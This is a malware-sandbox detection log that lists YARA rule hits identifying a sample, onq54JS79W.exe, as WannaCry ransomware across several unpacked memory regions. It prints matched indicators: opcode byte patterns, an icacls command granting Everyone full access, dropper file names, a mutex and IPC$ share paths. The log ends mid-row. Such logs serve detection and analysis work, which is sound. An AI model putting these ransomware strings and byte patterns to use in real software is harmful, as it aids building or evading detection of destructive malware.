1.2.onq54JS79W.exe.1ea5084.5.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x285dc0:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x285de8:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.1ea5084.5.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2788fe:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8140:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ... 0x24c984:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x24c8d4:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x24e25a:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x27e0a2:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.0.onq54JS79W.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.0.onq54JS79W.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.0.onq54JS79W.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.0.onq54JS79W.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.onq54JS79W.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.2.onq54JS79W.exe.7100a4.1.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.2.onq54JS79W.exe.7100a4.1.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.2.onq54JS79W.exe.7100a4.1.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.2.onq54JS79W.exe.7100a4.1.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.0.onq54JS79W.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.onq54JS79W.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.0.onq54JS79W.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.1ed7128.2.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.onq54JS79W.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.1ed7128.2.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.1ed7128.2.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.1ed7128.2.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.0.onq54JS79W.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.onq54JS79W.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
0.0.onq54JS79W.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.0.onq54JS79W.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.onq54JS79W.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8140:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.0.onq54JS79W.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.0.onq54JS79W.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
1.0.onq54JS79W.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.0.onq54JS79W.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.0.onq54JS79W.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8140:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.23d28e8.9.unpack	SUSP_Imphash_Mar23_2	Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal)	Arnim Rupp (https://github.com/ruppde)
1.2.onq54JS79W.exe.23d28e8.9.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x36580:$x1: icacls . /grant Everyone:F /T /C /Q 0x2634c:$x3: tasksche.exe 0x3655c:$x3: tasksche.exe 0x36538:$x4: Global\MsWinZonesCacheCounterMutexA 0x365b0:$x5: WNcry@2ol7 0xc330:$x7: mssecsvc.exe 0x26324:$x8: C:\%s\qeriuwjhrf 0x36580:$x9: icacls . /grant Everyone:F /T /C /Q 0xc318:$s1: C:\%s\%s 0x26338:$s1: C:\%s\%s 0x364b0:$s3: cmd.exe /c "%s" 0x68a04:$s4: msg/m_portuguese.wnry 0x2366c:$s5: \\192.168.56.20\IPC$ 0x10a61:$s6: \\172.16.99.5\IPC$ 0x29a86:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x29760:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x2934c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.onq54JS79W.exe.23d28e8.9.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.23d28e8.9.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x3655c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x36584:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.0.onq54JS79W.exe.7100a4.1.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.0.onq54JS79W.exe.7100a4.1.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.0.onq54JS79W.exe.7100a4.1.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.0.onq54JS79W.exe.7100a4.1.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.1eb4104.3.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x2dd20:$x1: icacls . /grant Everyone:F /T /C /Q 0x1daec:$x3: tasksche.exe 0x2dcfc:$x3: tasksche.exe 0x2dcd8:$x4: Global\MsWinZonesCacheCounterMutexA 0x2dd50:$x5: WNcry@2ol7 0x76d0:$x7: mssecsvc.exe 0x50a9ec:$x7: mssecsvc.exe 0x1dac4:$x8: C:\%s\qeriuwjhrf 0x2dd20:$x9: icacls . /grant Everyone:F /T /C /Q 0x76b8:$s1: C:\%s\%s 0x1dad8:$s1: C:\%s\%s 0x50a9d4:$s1: C:\%s\%s 0x2dc50:$s3: cmd.exe /c "%s" 0x601a4:$s4: msg/m_portuguese.wnry 0x1ae0c:$s5: \\192.168.56.20\IPC$ 0xb601:$s6: \\172.16.99.5\IPC$ 0x21226:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x20f00:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x20aec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 